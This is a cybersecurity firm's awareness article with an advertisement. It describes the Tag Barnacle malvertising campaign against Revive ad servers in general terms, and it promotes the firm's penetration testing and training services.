Introduction

This article is an attempt to provide awareness of the incident, 120 compromised ad servers that target millions of Internet users amidst the covid-19 pandemic.

From the beginning of the pandemic in 2020, most people have been forced to stay indoors working online from the confines of their homes. Now, this trying period also saw hackers working overtime to penetrate personal devices for accessing confidential data of users, including passwords. Having said this, today we can recollect how annoying pop-ups have increased over time with messages such as “you have won” or “your device is compromised,” etc.

People tend to fall prey to such pop-up ads and accidentally click on them out of fear or greed. The risk of clicking often leads one to accidentally install malware on their device. Hackers attack personal devices more than corporate devices. Corporate devices are nearly well-protected through internal firewalls and the usage of external Cisco service providers. Personal devices are less protected, thereby making them soft targets. 

The pandemic attack of ad servers

Recently, the news was about how hackers have attacked more than 120 ad servers since the pandemic lockdowns started. A well-organized sustained ad campaign that maliciously targeted millions of devices. These malicious ads appear benign outwardly and are trusted by users who fall into their trap. 

Malvertising is the new demon on the block. They deliver ads to people who visit various websites. These ads are JavaScript embedded that exploits any flaws in the device software. They trick people into downloading an unsafe app—paying fraudulent fees and exposing their device and data at tremendous risk.

Scammers hoodwink the internet ecosystem by posing as buyers by paying fees to ad delivery networks and getting to display their malicious ads on individual sites. Infiltrating the ad ecosystem requires time and resources. However, a malvertising firm which is known as “Tag Barnacle”, has been using a different strategy. They did not pose as buyers but instead went straight for compromising the ad serving infrastructure.  This meant they saved money by not running any ad campaigns and instead got hold of personal information for free.

This group has attacked and infected more than 120 ad servers in the past year using an open-source app system known as Revive. The hackers used primary and secondary malicious payloads on the compromised ad server. They used client-side fingerprinting to evade detection. Tag Barnacle’s target in 2020 was desktop traffic, and in 2021, they have focussed on targeting mobile devices as well.   

How was the malicious activity carried out?

Websites that receive ads from a hacked server carry out client-side fingerprinting. This delivers the second stage JavaScript payload that allows the user to click the tracker ad after being satisfied with certain checks and then redirects the user to malicious websites. They lure users to purchase a VPN app or a fake security or safety app that comes with a subscription cost. These hackers’ cookie their victim that reveals a low-frequency payload and avoids detection with low frequency.

When hackers successfully install malware onto devices, the users are unaware as malicious code lurks in the background.  The malware harnesses all personal information and passwords that are accessed when users visit different websites. The most dangerous attack happens when a user logs in for online banking. The login ID and password are harvested, and malware encrypts files, often demanding money known as ransomware to decrypt them. 

How do cybersecurity companies protect against hacking?

Several cybersecurity firms have taken note of the malvertising. Stolen passwords have been the major concern as in 2020 alone. Nearly 6.30 billion passwords were stolen and 80% confirmed such data breaches.  The banking, government, healthcare, and retail sectors have been susceptible to fraud.

Cybersecurity firms deploy penetration testing tools to identify the weakness of a system, especially, the current functioning of the network security features. These tools are useful as they can detect unknown vulnerabilities in software and network applications susceptible to a security breach.  Many organizations cannot be alert about risks and their ability to respond to threats. For them, cybersecurity service providers who are experts in managed detection and response (MDR) services provide them with tools and technologies to detect threats and respond adequately to them. They place these tools at the users’ premises, guard internet gateways and detect threats that have bypassed the standard security perimeter used by the client.

Getting a third-party cybersecurity service provider helps detect threats and ensures that the client receives comprehensive penetration tests. This includes IoT Penetration Testing, VPN Penetration testing, web penetration testing, network penetration testing, managed detection and response, and IT security training – network. The cybersecurity firm acts on a 24/7 basis surveillance of the system and their network through a combination of automation and manual monitoring.

We are offering various services like Penetration Testing, Digital Forensics, System Hardening and Managed Detection & Response (MDR).

Click here to learn more about our services


Get trained by Condition Zebra’s Cybersecurity Experts

We’re offering specialized training, in Network Penetration Testing and Web Application Penetration Testing. Both of this training program is high value because there is a practical session as well, so far we have 600+ IT Professionals from various background who have attended the training.

Click here to learn about Network Pentest training

Click here to learn about Web Application Pentest training